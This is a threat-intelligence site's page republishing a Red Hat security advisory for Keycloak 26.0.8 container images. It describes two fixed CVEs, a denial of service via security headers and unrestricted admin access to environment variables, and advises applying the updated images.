Red Hat Security Advisory: Red Hat build of Keycloak 26.0.8 Images Update
Red Hat build of Keycloak is an integrated sign-on solution, available as a Red Hat JBoss Middleware for OpenShift containerized image. The Red Hat build of Keycloak for OpenShift image provides an authentication server that you can use to log in centrally, log out, and register. You can also manage user accounts for web applications, mobile applications, and RESTful web services. Red Hat build of Keycloak Operator for OpenShift simplifies deployment and management of Keycloak 26.0.8 clusters. This erratum releases new images for Red Hat build of Keycloak 26.0.8 for use within the OpenShift Container Platform cloud computing Platform-as-a-Service (PaaS) for on-premise or private cloud deployments, aligning with the standalone product release. Security fixes: * Denial of Service in Keycloak Server via Security Headers (CVE-2024-11734) * Unrestricted admin use of system and environment variables (CVE-2024-11736)
AI Analysis
Technical Summary
This advisory addresses two vulnerabilities in the Red Hat build of Keycloak 26.0.8 for OpenShift. CVE-2024-11734 is a denial of service vulnerability triggered via security headers in the Keycloak server component. CVE-2024-11736 allows an administrator unrestricted access to system and environment variables, which could lead to unauthorized system configuration changes. Red Hat has released updated container images aligned with the standalone Keycloak 26.0.8 release to remediate these issues. The advisory applies to containerized deployments on OpenShift Container Platform and includes updates to the Keycloak Operator to simplify cluster management.
Potential Impact
The denial of service vulnerability (CVE-2024-11734) could disrupt authentication services by exploiting security headers, potentially causing service unavailability. The unrestricted admin use of system and environment variables (CVE-2024-11736) could allow an administrator to manipulate system settings beyond intended limits, potentially compromising system integrity or stability. Both vulnerabilities affect the authentication server functionality critical for centralized login and user management in web, mobile, and RESTful applications deployed via OpenShift. No known exploits in the wild have been reported at this time.
Mitigation Recommendations
Red Hat has released updated container images for the Red Hat build of Keycloak 26.0.8 and its Operator to address these vulnerabilities. Users should apply these updated images as provided by Red Hat. Before applying this update, ensure all previously released relevant errata have been applied. Detailed update instructions are available from Red Hat's official documentation. Since this is not a cloud service, remediation requires user action to deploy the updated images. No alternative mitigations or workarounds are specified in the advisory.
Red Hat Security Advisory: Red Hat build of Keycloak 26.0.8 Images Update
Description
Red Hat build of Keycloak is an integrated sign-on solution, available as a Red Hat JBoss Middleware for OpenShift containerized image. The Red Hat build of Keycloak for OpenShift image provides an authentication server that you can use to log in centrally, log out, and register. You can also manage user accounts for web applications, mobile applications, and RESTful web services. Red Hat build of Keycloak Operator for OpenShift simplifies deployment and management of Keycloak 26.0.8 clusters. This erratum releases new images for Red Hat build of Keycloak 26.0.8 for use within the OpenShift Container Platform cloud computing Platform-as-a-Service (PaaS) for on-premise or private cloud deployments, aligning with the standalone product release. Security fixes: * Denial of Service in Keycloak Server via Security Headers (CVE-2024-11734) * Unrestricted admin use of system and environment variables (CVE-2024-11736)
Affected software
AI-Powered Analysis
Machine-generated threat intelligence
Technical Analysis
This advisory addresses two vulnerabilities in the Red Hat build of Keycloak 26.0.8 for OpenShift. CVE-2024-11734 is a denial of service vulnerability triggered via security headers in the Keycloak server component. CVE-2024-11736 allows an administrator unrestricted access to system and environment variables, which could lead to unauthorized system configuration changes. Red Hat has released updated container images aligned with the standalone Keycloak 26.0.8 release to remediate these issues. The advisory applies to containerized deployments on OpenShift Container Platform and includes updates to the Keycloak Operator to simplify cluster management.
Potential Impact
The denial of service vulnerability (CVE-2024-11734) could disrupt authentication services by exploiting security headers, potentially causing service unavailability. The unrestricted admin use of system and environment variables (CVE-2024-11736) could allow an administrator to manipulate system settings beyond intended limits, potentially compromising system integrity or stability. Both vulnerabilities affect the authentication server functionality critical for centralized login and user management in web, mobile, and RESTful applications deployed via OpenShift. No known exploits in the wild have been reported at this time.
Mitigation Recommendations
Red Hat has released updated container images for the Red Hat build of Keycloak 26.0.8 and its Operator to address these vulnerabilities. Users should apply these updated images as provided by Red Hat. Before applying this update, ensure all previously released relevant errata have been applied. Detailed update instructions are available from Red Hat's official documentation. Since this is not a cloud service, remediation requires user action to deploy the updated images. No alternative mitigations or workarounds are specified in the advisory.
Technical Details
- Gcve Source
- db.gcve.eu
- Csaf Category
- csaf_security_advisory
- Csaf Version
- 2.0
- Publisher
- Red Hat Product Security
- Advisory Id
- RHSA-2025:0299
- Cve Count
- 2
- Additional Cves
- ["CVE-2024-11736"]
- Cvss Version
- null
Threat ID: 6a3c0cf1eed863c81e2392f9
Added to database: 06/24/2026, 16:59:29 UTC
Last enriched: 06/24/2026, 17:06:25 UTC
Last updated: 07/03/2026, 21:59:09 UTC
Views: 56
Community Reviews
0 reviewsCrowdsource mitigation strategies, share intel context, and vote on the most helpful responses. Sign in to add your voice and help keep defenders ahead.
Want to contribute mitigation steps or threat intel context? Sign in or create an account to join the community discussion.
Actions
Updates to AI analysis require Pro Console access. Upgrade inside Console → Billing.
Need more coverage?
Upgrade to Pro Console for AI refresh and higher limits.
For incident response and remediation, OffSeq services can help resolve threats faster.
Latest Threats
Check if your credentials are on the dark web
Instant breach scanning across billions of leaked records. Free tier available.